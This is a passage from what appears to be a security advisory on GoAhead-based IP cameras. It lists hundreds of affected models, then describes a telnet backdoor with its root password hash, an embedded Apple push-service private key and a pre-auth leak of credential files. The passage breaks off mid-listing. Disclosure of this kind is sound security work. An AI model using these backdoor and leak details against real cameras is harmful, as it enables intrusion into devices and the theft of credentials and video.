003arfu\r\nDB+Power DBPOWER\r\nDB+Power ERIK\r\nDB+Power HC-WV06\r\nDB+Power HD011P\r\nDB+Power HD012P\r\nDB+Power HD015P\r\nDB+Power L-615W\r\nDB+Power LA040\r\nDB+Power Other\r\nDB+Power Other2\r\nDB+Power VA-033K\r\nDB+Power VA0038K\r\nDB+Power VA003K+\r\nDB+Power VA0044_M\r\nDB+Power VA033K\r\nDB+Power VA033K+\r\nDB+Power VA035K\r\nDB+Power VA036K\r\nDB+Power VA038\r\nDB+Power VA038k\r\nDB+Power VA039K\r\nDB+Power VA039K-Test\r\nDB+Power VA040\r\nDB+Power VA390k\r\nDB+Power b\r\nDB+Power b-series\r\nDB+Power extcams\r\nDB+Power eye\r\nDB+Power kiskFirstCam\r\nDB+Power va033k\r\nDB+Power va039k\r\nDB+Power wifi\r\nDBB IP607W\r\nDEVICECLIENTQ CNB\r\nDKSEG Other\r\nDNT CamDoo\r\nDVR DVR\r\nDVS-IP-CAM Other\r\nDVS-IP-CAM Outdoor/IR\r\nDagro DAGRO-003368-JLWYX\r\nDagro Other\r\nDericam H216W\r\nDericam H502W\r\nDericam M01W\r\nDericam M2/6/8\r\nDericam M502W\r\nDericam M601W\r\nDericam M801W\r\nDericam Other\r\nDigix Other\r\nDigoo BB-M2\r\nDigoo MM==BB-M2\r\nDigoo bb-m2\r\nDinon 8673\r\nDinon 8675\r\nDinon SEGEV-105\r\nDinon segev-103\r\nDome Other\r\nDrilling+machines Other\r\nE-Lock 1000\r\nENSIDIO IP102W\r\nEOpen Open730\r\nEST ES-IP602IW\r\nEST IP743W\r\nEST Other\r\nEZCam EPK-EP10L1\r\nEZCam EZCam\r\nEZCam Other\r\nEZCam PAN/TILT\r\nEZCam Pan/Tilt\r\nEasyCam EC-101HD\r\nEasyCam EC-101HDSD\r\nEasyCam EC-101SD\r\nEasyCam EC-102\r\nEasyCam Other\r\nEasyN 187\r\nEasyN 1BF\r\nEasyN 720P\r\nEasyN F\r\nEasyN F-136\r\nEasyN F-M136\r\nEasyN F-M166\r\nEasyN F-M181\r\nEasyN F-M1b1\r\nEasyN F-SERIES\r\nEasyN F133\r\nEasyN F2-611B\r\nEasyN F3\r\nEasyN F3-166\r\nEasyN F3-176M\r\nEasyN F3-M166\r\nEasyN F3-SERIES\r\nEasyN F3-Series\r\nEasyN F3-m187\r\nEasyN F3M187\r\nEasyN FS-613A-M136\r\nEasyN FS-613B\r\nEasyN FS-613B-M166\r\nEasyN FS-613B-MJPEG\r\nEasyN FS613\r\nEasyN F_M10R\r\nEasyN H3-V10R\r\nEasyN H6-M137h\r\nEasyN M091\r\nEasyN Other\r\nEasyN est-007660-611b\r\nEasyN est-007660333\r\nEasyN f\r\nEasyN f-Series\r\nEasyN f138\r\nEasyN f_series\r\nEasyN fseries\r\nEasyN kitch\r\nEasyN s\r\nEasySE F/B/N/I\r\nEasySE H3\r\nEasySE H3e\r\nEasySE Other\r\nEbode IPV38W\r\nEbode IPV58\r\nEbode Other\r\nEgo Other\r\nElro 901\r\nElro 903\r\nElro 903IP\r\nElro C7031P\r\nElro C703IP2\r\nElro C704-IP\r\nElro C704IP\r\nElro C704IP.2\r\nElro C704ip\r\nElro C803IP\r\nElro C903IP\r\nElro C903IP.2\r\nElro C904IP\r\nElro C904IP.2\r\nElro IP901\r\nElro Other\r\nEminent 6564\r\nEminent EM6220\r\nEminent EM6564\r\nEminent em6220\r\nEsky C5900\r\nEsky L\r\nEsky Live\r\nEsky c5900\r\nEura-Tech IC-03C3\r\nEyeCam ICAM-608\r\nEyeCam IP65IW\r\nEyeCam Other\r\nEyeCam STORAGEOPTIONS\r\nEyeIPCam IP901W\r\nEyeSight ES-IP607W\r\nEyeSight ES-IP811W\r\nEyeSight ES-IP909IW\r\nEyeSight ES-IP935FW\r\nEyeSight ES-IP935IW\r\nEyeSight IP910IW\r\nEyeSight IP915IW\r\nEyeSight Other\r\nEyeSight ip609IW\r\nEyeSight ip909iw\r\nEyeSight ip915iw\r\nEyeSight mjpeg\r\nEyeSpy247 Other\r\nF-Series FSERIES\r\nF-Series Ip\r\nF-Series Other\r\nF-Series ip\r\nFirst+Concept Other\r\nFocuscam F19821W\r\nFoscam FI18904w\r\nFoscam FI18905E\r\nFoscam FI18905W\r\nFoscam FI18906w\r\nFoscam FI1890W\r\nFoscam FI18910E\r\nFoscam FI18910W\r\nFoscam FI18910w\r\nFoscam FI18916W\r\nFoscam FI18918W\r\nFoscam FI18919W\r\nFoscam FI19810W\r\nFoscam FI8094W\r\nFoscam FI81904W\r\nFoscam FI8601W\r\nFoscam FI8602W\r\nFoscam FI8606W\r\nFoscam FI8610w\r\nFoscam FI8903W\r\nFoscam FI8903W_Elita\r\nFoscam FI8904\r\nFoscam FI8904W\r\nFoscam FI8905E\r\nFoscam FI8905W\r\nFoscam FI8905w\r\nFoscam FI8906w\r\nFoscam FI8907W\r\nFoscam FI8908W\r\nFoscam FI8909W\r\nFoscam FI890W\r\nFoscam FI8910\r\nFoscam FI8910E\r\nFoscam FI8910W\r\nFoscam FI8910W_DW\r\nFoscam FI8910w\r\nFoscam FI8916W\r\nFoscam FI8918\r\nFoscam FI89180w\r\nFoscam FI8918E\r\nFoscam FI8918W\r\nFoscam FI8918w\r\nFoscam FI8919W\r\nFoscam FI9804W\r\nFoscam FI9805E\r\nFoscam FI9810\r\nFoscam FI9810W\r\nFoscam FI9818\r\nFoscam FI9820w\r\nFoscam FI9821W\r\nFoscam FI9821w\r\nFoscam FL8910\r\nFoscam FS18908W\r\nFoscam FS8910\r\nFoscam Fi8910\r\nFoscam Other\r\nFoscam fI8989w\r\nFoscam fi1890w\r\nFoscam fl8910w\r\nFoxCam PTZ2084-L\r\nGIGA gb\r\nGT+ROAD HS-006344-SPSLM\r\nGeneral Other\r\nGeneric All-in-one\r\nGeneric Billy\r\nGeneric DomeA-Outdoor\r\nGeneric IP\r\nGeneric Other\r\nGi-star+srl IP6031W\r\nGigaeye GB\r\nGoAhead EC-101SD\r\nGoAhead GoAheadWebs\r\nGoAhead IPCAM1\r\nGoAhead IPCAM2\r\nGoAhead Other\r\nGoAhead thedon\r\nGoCam Other\r\nGoclever EYE\r\nGoclever EYE2\r\nGotake GTK-TH01B\r\nH+264+network+DVR 720p\r\nH+264+network+DVR Other\r\nH.264 Other\r\nH6837WI Other\r\nHD+IPC Other\r\nHD+IPC SV3C\r\nHDIPCAM Other\r\nHeden CAMH04IPWE\r\nHeden CAMHED02IPW\r\nHeden CAMHED04IP\r\nHeden CAMHED04IPWN\r\nHeden CAMHEDIPWP\r\nHeden Other\r\nHeden VisionCam\r\nHeden visionCam\r\nHiSilicon Other\r\nHikvision DS-2CD2132\r\nHistream RTSP\r\nHooToo F-SERIES\r\nHooToo HOOTOO\r\nHooToo HT-IP006\r\nHooToo HT-IP006N\r\nHooToo HT-IP009HDP\r\nHooToo HT-IP206\r\nHooToo HT-IP207F\r\nHooToo HT-IP210HDP\r\nHooToo HT-IP210P\r\nHooToo HT-IP212\r\nHooToo IP009HDP\r\nHooToo Other\r\nHooToo apm-h803-mpc\r\nHsmartlink Other\r\nHungtek WIFI\r\nICAMView Other\r\nICam I908W\r\nICam IP-1\r\nICam Other\r\nICam Other2\r\nICam dome\r\nINISOFT-CAM Stan\r\nINSTAR 4010\r\nINVID Other\r\nIO+Data Other\r\nIP66 Other\r\nIPC IPC02\r\nIPC Other\r\nIPC S5030-TF\r\nIPC S5030-m\r\nIPC SRICAM\r\nIPCC 3XPTZ\r\nIPCC 7210W\r\nIPCC IPCC-7210W\r\nIPCC x01\r\nIPTeles Other\r\nIPUX ip-100\r\nISIT Other\r\nIZOtech Other\r\nIZTOUCH 0009\r\nIZTOUCH A001\r\nIZTOUCH IZ-009\r\nIZTOUCH LTH-A8645-c15\r\nIZTOUCH Other\r\nIZTOUCH Other1\r\nIZTOUCH ap001\r\nIeGeek Other\r\nIeGeek ukn\r\nInkovideo V-104\r\nIprobot3 Other\r\nJRECam JM3866W\r\nJWcam JWEV\r\nJWcam Other\r\nJaycar 3834\r\nJaycar 720P\r\nJaycar Other\r\nJaycar QC-3831\r\nJaycar QC-3832\r\nJaycar QC-3834\r\nJaycar QC-3836\r\nJaycar QC-3839\r\nJaytech IP6021W\r\nJhempCAM Back\r\nJhempCAM Other\r\nKaiKong 1601\r\nKaiKong 1602w\r\nKaiKong Other\r\nKaiKong SIP\r\nKaiKong SIP1602\r\nKaiKong SIP1602W\r\nKaiKong sip\r\nKaiKong sip1602w\r\nKenton gjc02\r\nKinson C720PWIP\r\nKlok Other\r\nKnewmart KW01B\r\nKnewmart KW02B\r\nKogan KAIPC01BLKA\r\nKogan KAIPCO1BLKA\r\nKogan Other\r\nKogan encoder\r\nKogan kaipc01blkb\r\nKompernass IUK\r\nKoolertron Other\r\nKoolertron PnP\r\nKoolertron SP-SHEX21-SL\r\nLC+security Other\r\nLW lw-h264tf\r\nLYD H1385H\r\nLager Other\r\nLeadtek C351\r\nLevelOne 1010/2010\r\nLibor Other\r\nLifeTech MyLifeTech\r\nLifeTech Other\r\nLifeTech dd\r\nLilly Other\r\nLinq Other\r\nLloyds 1107\r\nLoftek CXS\r\nLoftek Nexus\r\nLoftek Other\r\nLoftek SPECTOR\r\nLoftek Sendinel\r\nLoftek Sentinel\r\nLogiLink WC0030A\r\nLogiLink wc0044\r\nLogitech C920\r\nMCL 610\r\nMJPEG Other\r\nMaginon 100\r\nMaginon 10AC\r\nMaginon 20C\r\nMaginon IP-20c\r\nMaginon IPC\r\nMaginon IPC-1\r\nMaginon IPC-10\r\nMaginon IPC-100\r\nMaginon IPC-100AC\r\nMaginon IPC-10AC\r\nMaginon IPC-2\r\nMaginon IPC-20\r\nMaginon IPC20C\r\nMaginon IPC_1A\r\nMaginon Other\r\nMaginon SUPRA\r\nMaginon Supra\r\nMaginon ipc\r\nMaginon ipc-1a\r\nMaginon ipc100a\r\nMaginon ipx\r\nMaginon w2\r\nMarmitek GM-8126\r\nMaygion IP\r\nMaygion OTHER2\r\nMaygion Other\r\nMaygion V3\r\nMaygion black\r\nMediatech mt4050\r\nMedisana SmartBabyMonitor\r\nMerlin IP\r\nMerlin Other\r\nMerlin vstc\r\nMessoa Other\r\nMingyoushi S6203Y-WR\r\nMomentum 2002\r\nMomentum MO-CAM\r\nNEXCOM S-CAM\r\nNIP NIP-004500-KMTLU\r\nNIP NIP-075007-UPHTF\r\nNIP NIP-11BGPW\r\nNIP NIP-14\r\nNTSE Other\r\nNeewer Other\r\nNeewer V-100\r\nNeo+CoolCam NIP\r\nNeo+CoolCam NIP-02(OAM)\r\nNeo+CoolCam NIP-06\r\nNeo+CoolCam NIP-066777-BWESL\r\nNeo+CoolCam NIP-102428-DFBEF\r\nNeo+CoolCam NIP-H20(OZX)\r\nNeo+CoolCam OBJ-007260-LYLDU\r\nNeo+CoolCam Other\r\nNeo+CoolCam neo\r\nNeo+CoolCam nip-11\r\nNeo+CoolCam nip-20\r\nNess Other\r\nNetView Other\r\nNetcam Dual-HD\r\nNetcam HSL-232245-CWXES\r\nNetcam OUVIS\r\nNetcam Other\r\nNetware Other\r\nNexxt+Solution Xpy\r\nNixzen Other\r\nNorthQ NQ-9006\r\nOffice+One CM-I11123BK\r\nOffice+One IP-900\r\nOffice+One IP-99\r\nOffice+One Other\r\nOffice+One SC-10IP\r\nOffice+One ip-900\r\nOffice+One ip900\r\nOpexia OPCS\r\nOptica+Video FI-8903W\r\nOptica+Video FI-8918W\r\nOptica+Video Other\r\nOtto 4eye\r\nOvermax CamSpot\r\nOvermax Camspot\r\nOwlCam CP-6M201W\r\nP2p wificam\r\nPCS Other\r\nPanasonic BL-C131A\r\nPeopleFu IPC-674\r\nPeopleFu IPCAM1\r\nPeopleFu IPCAM2\r\nPeopleFu IPCAM3\r\nPeopleFu IPCAM5\r\nPixpo 1Z074A2A0301627785\r\nPixpo PIX006428BFYZY\r\nPixpo PIX009491MLJYM\r\nPixpo PIX009495HURFE\r\nPixpo PIX010584DFACE\r\nPlaisio IP\r\nPlanex Other\r\nPlanex PLANEX\r\nPolariod P351S\r\nPolaroid IP-100\r\nPolaroid IP-101W\r\nPolaroid IP-200B\r\nPolaroid IP-201B\r\nPolaroid IP-350\r\nPolaroid IP-351S\r\nPolaroid IP-360S\r\nPolaroid IP-810W\r\nPolaroid IP-810WZ\r\nPolaroid Other\r\nPolaroid POLIP101W\r\nPolaroid POLIP201B\r\nPolaroid POLIP201W\r\nPolaroid POLIP351S\r\nPolaroid POLIP35i5\r\nPowerLead Caue\r\nPowerLead PC012\r\nProveCam IP2521\r\nProvision 717\r\nProvision F-717\r\nProvision F-737\r\nProvision PT-737\r\nProvision WP-711\r\nProvision WP-717P\r\nPyle HD\r\nPyle HD22\r\nPyle HD46\r\nPyle Mine\r\nPyle PIPCAM15\r\nPyle Pipcam12\r\nPyle cam5\r\nPyle pipcam25\r\nPyle pipcam5\r\nQ-nest QN-100S\r\nQ-nest qn-100s\r\nQueback 720p\r\nROCAM NC-400\r\nROCAM NC-500\r\nROCAM NC300\r\nROCAM NC300-1\r\nROHS IP\r\nROHS none\r\nRTX 06R\r\nRTX DVS\r\nRTX IP-06R\r\nRTX IP-26H\r\nRTX Other\r\nRollei safetycam-10hd\r\nSES Other\r\nSKJM Other\r\nSST SST-CNS-BUI18\r\nSVB+International SIP-018262-RYERR\r\nSafeHome 278042\r\nSafeHome 616-W\r\nSafeHome IP601W-hd\r\nSafeHome Other\r\nSafeHome VGA\r\nSafeHome iprobot\r\nSamsung Other\r\nSantec-Video Other\r\nSarotech IPCAM-1000\r\nSarotech ip300\r\nScricam 004\r\nScricam 192.168.1.7\r\nScricam AP-004\r\nScricam AP-009\r\nScricam AP0006\r\nScricam AP006\r\nSecam+CCTV IPCAM\r\nSecam+CCTV Other\r\nSeculink 10709\r\nSeculink Other\r\nSecur+Eye xxc5330\r\nSeisa JK-H616WS\r\nSenao PTZ-01H\r\nSequrecam Other\r\nSequrecam PNP-125\r\nSercomm Other\r\nShenwhen+Neo+Electronic+Co NC-541\r\nShenwhen+Neo+Electronic+Co Other\r\nShenwhen+Neo+Electronic+Co X-5000B\r\nShenzhen 720P\r\nShixin+China IP-129HW\r\nSiepem IPC\r\nSiepem S5001Y-BW\r\nSiepem S6203y\r\nSiepem S6211Y-WR\r\nSimi+IP+Camera+Viewer Other\r\nSineoji Other\r\nSineoji PT-315V\r\nSineoji PT-3215P\r\nSineoji PT-325IP\r\nSinocam Other\r\nSky+Genious Genious\r\nSkytronic IP\r\nSkytronic IP99\r\nSkytronic Other\r\nSkytronic WiFi\r\nSkytronic dome\r\nSmartEye Other\r\nSmartWares C723IP\r\nSmartWares c724ip\r\nSmartWares c923ip\r\nSmartWares c924ip\r\nSolwise SEC-1002W-IR\r\nSpy+Cameras WF-100PCX\r\nSpy+Cameras WF-110V\r\nSricam 0001\r\nSricam 004\r\nSricam A0009\r\nSricam A001\r\nSricam AP-001\r\nSricam AP-003\r\nSricam AP-004\r\nSricam AP-005\r\nSricam AP-006\r\nSricam AP-009\r\nSricam AP-012\r\nSricam AP-CAM\r\nSricam AP0009\r\nSricam AP002\r\nSricam AP995\r\nSricam Cam1\r\nSricam Front\r\nSricam Home\r\nSricam Other\r\nSricam SP005\r\nSricam SP012\r\nSricam SP013\r\nSricam SP015\r\nSricam SRICAM\r\nSricam SRICAM1\r\nSricam aj-c2wa-c118\r\nSricam ap\r\nSricam ap006\r\nSricam ap1\r\nSricam h.264\r\nSricam sp013\r\nSricctv A-0006\r\nSricctv A-009\r\nSricctv AJ-006\r\nSricctv AP-0001\r\nSricctv AP-0005\r\nSricctv AP-0009\r\nSricctv AP-001\r\nSricctv AP-002\r\nSricctv AP-003\r\nSricctv AP-004\r\nSricctv AP-004AF\r\nSricctv AP-005\r\nSricctv AP-006\r\nSricctv AP-007\r\nSricctv AP-008\r\nSricctv AP-009\r\nSricctv AP-011\r\nSricctv AP-014\r\nSricctv H-264\r\nSricctv Other\r\nSricctv P2P-BLACK\r\nSricctv P2P-Black\r\nSricctv SP-007\r\nSricctv SR-001\r\nSricctv SR-004\r\nStar+Vedia 6836\r\nStar+Vedia 7837-WIP\r\nStar+Vedia C-7835WIP\r\nStar+Vedia Other\r\nStar+Vedia T-6836WTP\r\nStar+Vedia T-7833WIP\r\nStar+Vedia T-7837WIP\r\nStar+Vedia T-7838WIP\r\nStarCam C33-X4\r\nStarCam EY4\r\nStarCam F6836W\r\nStarCam Other\r\nStarCam c7837wip\r\nStipelectronics Other\r\nStorage+Options HOMEGUARD\r\nStorage+Options Other\r\nStorage+Options SON-IPC1\r\nSumpple 610\r\nSumpple 610S\r\nSumpple 631\r\nSumpple 960P\r\nSumpple S601\r\nSumpple S610\r\nSumpple S631\r\nSumpple S651\r\nSumpple qd300\r\nSumpple s631\r\nSunVision+US Other\r\nSunbio Other\r\nSuneyes Other\r\nSuneyes SP-T01EWP\r\nSuneyes SP-T01WP\r\nSuneyes SP-TM01EWP\r\nSuneyes SP-TM01WP\r\nSuneyes SP-tm05wp\r\nSunluxy H-264\r\nSunluxy HZCam\r\nSunluxy Other\r\nSunluxy PTZ\r\nSunluxy SL-701\r\nSupra+Space IPC\r\nSupra+Space IPC-1\r\nSupra+Space IPC-100AC\r\nSupra+Space IPC-10AC\r\nSupra+Space Other11\r\nSupra+Space ipc-20c\r\nSure-Eye Other\r\nSurecom LN-400\r\nSwann 005FTCD\r\nSwann 440\r\nSwann 440-IPC\r\nSwann ADS-440\r\nSwann ADS-440-PTZ\r\nSwann ADS-CAMAX1\r\nSwann Other\r\nSwann SWADS-440-IPC\r\nSwann SWADS-440IPC-AU\r\nSygonix 43176A\r\nSygonix 43558A\r\nSzneo CAM0X\r\nSzneo CoolCam\r\nSzneo NIP\r\nSzneo NIP-0\r\nSzneo NIP-02\r\nSzneo NIP-031\r\nSzneo NIP-031H\r\nSzneo NIP-06\r\nSzneo NIP-12\r\nSzneo NIP-2\r\nSzneo NIP-20\r\nSzneo NIP-210485-ABABC\r\nSzneo NIP-26\r\nSzneo NIP-X\r\nSzneo NP-254095\r\nSzneo Other\r\nSzneo TFD\r\nTAS-Tech Other\r\nTechnaxx tx-23\r\nTechview GM8126\r\nTechview QC-3638\r\nTechview qc3839\r\nTemvis Other\r\nTenda C50S\r\nTenda c30\r\nTenda c5+\r\nTenvis 0012\r\nTenvis 3815\r\nTenvis 3815-W\r\nTenvis 3815W\r\nTenvis 3815W.\r\nTenvis 3815W2013\r\nTenvis IP-319W\r\nTenvis IP-319w\r\nTenvis IP-391W\r\nTenvis IP-391WHD\r\nTenvis IP-602W\r\nTenvis IP602W\r\nTenvis IPROBOT\r\nTenvis JP-3815W\r\nTenvis JPT-3814WP2P\r\nTenvis JPT-3815\r\nTenvis JPT-3815-P2P\r\nTenvis JPT-3815W\r\nTenvis JPT-3815W+\r\nTenvis JPT-3815WP2P\r\nTenvis JPT-3815w\r\nTenvis JPT-3818\r\nTenvis MINI-319W\r\nTenvis Mini-319\r\nTenvis Other\r\nTenvis PT-7131W\r\nTenvis TH-661\r\nTenvis TR-3818\r\nTenvis TR-3828\r\nTenvis TR3815W\r\nTenvis TZ100\r\nTenvis TZ100/IPROBOT3\r\nTenvus JPG3815W\r\nThreeboy IP-660\r\nTopcam SL-30IPC01Z\r\nTopcam SL-720IPC02Z\r\nTopcam SL-910IW30\r\nTopica+CCTV Other\r\nTrivision NC-335PW-HD-10\r\nTrust NW-7500\r\nTurbo+X Endurance\r\nTurbo+X IIPC-20\r\nUokoo 720P\r\nVCatch Other\r\nVCatch VC-MIC720HK\r\nValtronics IP\r\nValtronics Other\r\nVandesc IP900\r\nVantech Other\r\nVantech PTZ\r\nVideosec+Security IPC-103\r\nVideosec+Security IPP-105\r\nVimicro Other\r\nVitek+CCTV Other\r\nVstarcam 7823\r\nVstarcam C-7824WIP\r\nVstarcam C-7833WIP-X4\r\nVstarcam C-7833wip\r\nVstarcam C-7837WIP\r\nVstarcam C-7838WIP\r\nVstarcam C50S\r\nVstarcam C7816W\r\nVstarcam C7824WIP\r\nVstarcam C782WIP\r\nVstarcam C7842WIP\r\nVstarcam C93\r\nVstarcam C=7824WIP\r\nVstarcam Cam360\r\nVstarcam F-6836W\r\nVstarcam H-6837WI\r\nVstarcam H-6837WIP\r\nVstarcam H-6850\r\nVstarcam H-6850WIP\r\nVstarcam H-6850wip\r\nVstarcam ICAM-608\r\nVstarcam Other\r\nVstarcam T-6835WIP\r\nVstarcam T-6836WTP\r\nVstarcam T-6892wp\r\nVstarcam T-7815WIP\r\nVstarcam T-7833WIP\r\nVstarcam T-7833wip\r\nVstarcam T-7837WIP\r\nVstarcam T-7838WIP\r\nVstarcam T-7892WIP\r\nVstarcam T6836WTP\r\nVstarcam T7837WIP\r\nVstarcam c7815wip\r\nVstarcam c7833wip\r\nVstarcam c7850wip\r\nWanscam 00D6FB01980F\r\nWanscam 106B\r\nWanscam 118\r\nWanscam 541-W\r\nWanscam 543-W\r\nWanscam 790\r\nWanscam AJ-C0WA-198\r\nWanscam AJ-C0WA-B106\r\nWanscam AJ-C0WA-B116\r\nWanscam AJ-C0WA-B168\r\nWanscam AJ-C0WA-B1D8\r\nWanscam AJ-C0WA-C0D8\r\nWanscam AJ-C0WA-C116\r\nWanscam AJ-C0WA-C126\r\nWanscam AJ-C2WA-B118\r\nWanscam AJ-C2WA-C116\r\nWanscam AJ-C2WA-C118\r\nWanscam AJ-C2WA-C198\r\nWanscam AJ-COWA-B1D8\r\nWanscam AJ-COWA-C116\r\nWanscam AJ-COWA-C126\r\nWanscam AJ-COWA-C128\r\nWanscam AW00004J\r\nWanscam B1D8-1\r\nWanscam C-118\r\nWanscam C-126\r\nWanscam Colour\r\nWanscam FI-18904w\r\nWanscam FR-4020A2\r\nWanscam FR4020A2\r\nWanscam HD-100W\r\nWanscam HW-0021\r\nWanscam HW-0022\r\nWanscam HW-0022HD\r\nWanscam HW-0023\r\nWanscam HW-0024\r\nWanscam HW-0025\r\nWanscam HW-0026\r\nWanscam HW-0028\r\nWanscam HW-0033\r\nWanscam HW-0036\r\nWanscam HW-0038\r\nWanscam HW-0039\r\nWanscam HW-22\r\nWanscam HW0030\r\nWanscam IP\r\nWanscam JW-0001\r\nWanscam JW-0003\r\nWanscam JW-0004\r\nWanscam JW-0004m\r\nWanscam JW-0005\r\nWanscam JW-0006\r\nWanscam JW-0008\r\nWanscam JW-0009\r\nWanscam JW-0010\r\nWanscam JW-0011\r\nWanscam JW-0011l\r\nWanscam JW-0012\r\nWanscam JW-0018\r\nWanscam JW-004\r\nWanscam JW-009\r\nWanscam JW-CD\r\nWanscam JW000008\r\nWanscam JW0009\r\nWanscam JW001\r\nWanscam JW0012\r\nWanscam JW008\r\nWanscam JWEV\r\nWanscam JWEV-011777-NSRVV\r\nWanscam JWEV-011921-RXSXT\r\nWanscam JWEV-360171-BBEAC\r\nWanscam JWEV-380096-CECDB\r\nWanscam JWEV-PEPLOW\r\nWanscam NBC-543W\r\nWanscam NC-530\r\nWanscam NC-541\r\nWanscam NC-541/W\r\nWanscam NC-541W\r\nWanscam NC-541w\r\nWanscam NC-543W\r\nWanscam NCB-534W\r\nWanscam NCB-540W\r\nWanscam NCB-541W\r\nWanscam NCB-541WB\r\nWanscam NCB-543W\r\nWanscam NCBL-618W\r\nWanscam NCH-532MW\r\nWanscam NCL-610W\r\nWanscam NCL-612W\r\nWanscam NCL-616W\r\nWanscam NCL-S616W\r\nWanscam Other\r\nWanscam TG-002\r\nWanscam WJ-0004\r\nWanscam WX-617\r\nWanscam Works\r\nWanscam XHA-120903181\r\nWanscam XHA-4020a2\r\nWanscam __PTZ\r\nWanscam chiOthernese\r\nWanscam ip\r\nWanscam jw0005\r\nWanscam jw0010\r\nWansview 541\r\nWansview 625W\r\nWansview MCM-627\r\nWansview N540w\r\nWansview NCB-534W\r\nWansview NCB-541W\r\nWansview NCB-541w\r\nWansview NCB-543W\r\nWansview NCB541W\r\nWansview NCB545W\r\nWansview NCL-610W\r\nWansview NCL610D04\r\nWansview NCL614W\r\nWansview Other\r\nWansview dcs543w\r\nWansview nc543w\r\nWardmay+CCTV WDM-6702AL\r\nWatch+bot+Camera resup\r\nWebcamXP Other\r\nWinBook Other\r\nWinBook T-6835\r\nWinBook T-6835WIP\r\nWinBook T-7838\r\nWinic NVT-530004\r\nWise+Group Other\r\nX-Price Other\r\nX10 39A\r\nX10 AIRSIGHT\r\nX10 AirSight\r\nX10 Airsight\r\nX10 Jake\r\nX10 Other\r\nX10 XC-38A\r\nX10 XX-36A\r\nX10 XX-39A\r\nX10 XX-56A\r\nX10 XX-59A\r\nX10 XX-60\r\nX10 XX-69A\r\nX10 XX41Ahome\r\nXVision Other\r\nXXCamera 53100\r\nXXCamera 5330-E\r\nXXCamera Other\r\nXXCamera XXC-000723-NJFJD\r\nXXCamera XXC-092411-DCAFC\r\nXXCamera XXC-50100-H\r\nXXCamera XXC-50100-T\r\nXXCamera XXC-5030-E\r\nXXCamera XXC-53100-T\r\nXXCamera XXC52130\r\nXin+Ling Other\r\nYawcam Other\r\nZilink Other\r\nZmodo CMI-11123BK\r\nZmodo IP-900\r\nZmodo Other\r\nZodiac+Security 909\r\nZodiac+Security Other\r\nZoneway NC638MW-P\r\nZyXEL Other\r\nalexim Other\r\nalexim cam22822\r\nalias Other\r\nall+in+one+ Other\r\nall+in+one+ b1\r\nall-in-one Other\r\nallecto DVC-150IP\r\napc Other\r\nasw-006 Other\r\nboh l\r\nbravo Other\r\nbush+plus BU-300WF\r\nccam p2p\r\nchina 8904W\r\nchina HDIPCAM\r\nchina IPCAM\r\nchina Other\r\nchina PTZCAM\r\nchina np-02\r\nciana+exports antani\r\ncina Other\r\ncoolead L\r\ncoolead L610WS\r\ndax Other\r\ndenver IPC-320\r\ndenver IPO-320\r\ne-landing 720p\r\neScam QF100\r\nebw Other\r\nepexis PIPCAMHD82\r\nepexis pipcam5\r\nesecure nvp\r\ngeeya C602\r\ngeeya P2P\r\ngeeya c801\r\nhdcam Other\r\nhomeguard 720P\r\nhomeguard Other\r\nhomeguard Wireless\r\nhomeguard wifi\r\niView ID002A\r\niView Other\r\ninsteon 75790\r\ninsteon 75790wh\r\ninsteon High\r\ninsteon Other\r\ninsteon Wireless\r\niuk 5A1\r\nivision hdwificam\r\niwitness bullet\r\njwt Other\r\njyacam JYA8010\r\nkadymay KDM-6800\r\nkadymay KDM6702\r\nkadymay KMD-6800\r\nkadymay Other\r\nkang+xun xxc5030-t\r\nkines Other\r\nkiocong 1601\r\nkiocong 1602\r\nkiocong 1609\r\nkiocong Other\r\nkodak 201pl\r\nkoicong 1601\r\nl+series CAM0758\r\nl+series CAM0760\r\nl+series Other\r\nl+series V100\r\nlogan n8504hh\r\nmeyetech 095475-caeca\r\nmeyetech 188091-EFBAE\r\nmeyetech Other\r\nmeyetech WirelessCam\r\nmicasaverde VistaCamSD\r\npipcam HD17\r\npni 941w\r\npni IP451W\r\npni IP541W\r\npni IP941W\r\npni IP951W\r\npni Other\r\npnp IP\r\npnp Other\r\nsemac Other\r\nskylink WC-300PS\r\nstorex D-10H\r\n\r\n```\r\n\r\n[Shodan lists 185 000 vulnerable cameras](https://www.shodan.io/search?query=GoAhead+5ccc069c403ebaf9f0171e9517f40e41).\r\n\r\n<a id=\"backdoor-account\"></a>\r\n\r\n## Details - Backdoor account\r\n\r\nBy default, telnetd is running on the camera.\r\n\r\n```\r\nuser@kali$ telnet 192.168.1.107\r\nTrying 192.168.1.107...\r\nConnected to 192.168.1.107.\r\nEscape character is '^]'.\r\n\r\napk-link login: admin\r\nPassword:\r\n\r\ntelnet> q\r\nConnection closed.\r\nuser@kali$\r\n\r\n```\r\n\r\nOne backdoor account exists in the camera:\r\n\r\n```\r\nroot:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh\r\n\r\n```\r\n\r\n\r\n\r\n## Details - RSA key and certificates\r\n\r\nThe `/system/www/pem/ck.pem` contains an Apple certificate with a private RSA key:\r\n\r\n```\r\n/ # cat /system/www/pem/ck.pem \r\nBag Attributes\r\n friendlyName: Apple Production IOS Push Services: com.app.camera\r\n localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \r\nsubject=/UID=com.app.camera/CN=Apple Production IOS Push Services: com.app.camera/OU=SQ6NNPBE2K/C=US\r\nissuer=/C=US/O=Apple Inc./OU=Apple Worldwide Developer Relations/CN=Apple Worldwide Developer Relations Certification Authority\r\n-----BEGIN CERTIFICATE-----\r\n[...]\r\n-----END CERTIFICATE-----\r\nBag Attributes\r\n friendlyName: andrew\r\n localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \r\nKey Attributes: <No Attributes>\r\n-----BEGIN RSA PRIVATE KEY-----\r\n[...]\r\n-----END RSA PRIVATE KEY-----\r\n\r\n```\r\n\r\n<a id=\"pre-auth-info-leak-goahead\"></a>\r\n\r\n## Details - Pre-Auth Info Leak (credentials) within the GoAhead http server\r\n\r\nThe HTTP interface is provided by GoAhead. It allows 2 kinds of authentication:\r\n\r\n* htdigest authentication OR\r\n* authentication using credentials in URI (`?loginuse=LOGIN&?loginpas=PASS`).\r\n\r\nBy default, the web directory contains symbolic links to configuration files (`system.ini` and `system-b.ini` contain credentials):\r\n\r\n```\r\n/tmp/web # ls -la *ini\r\nlrwxrwxrwx 1 root 0 25 Oct 27 02:11 factory.ini -> /system/param/factory.ini\r\nlrwxrwxrwx 1 root 0 30 Oct 27 02:11 factoryparam.ini -> /system/param/factoryparam.ini\r\nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 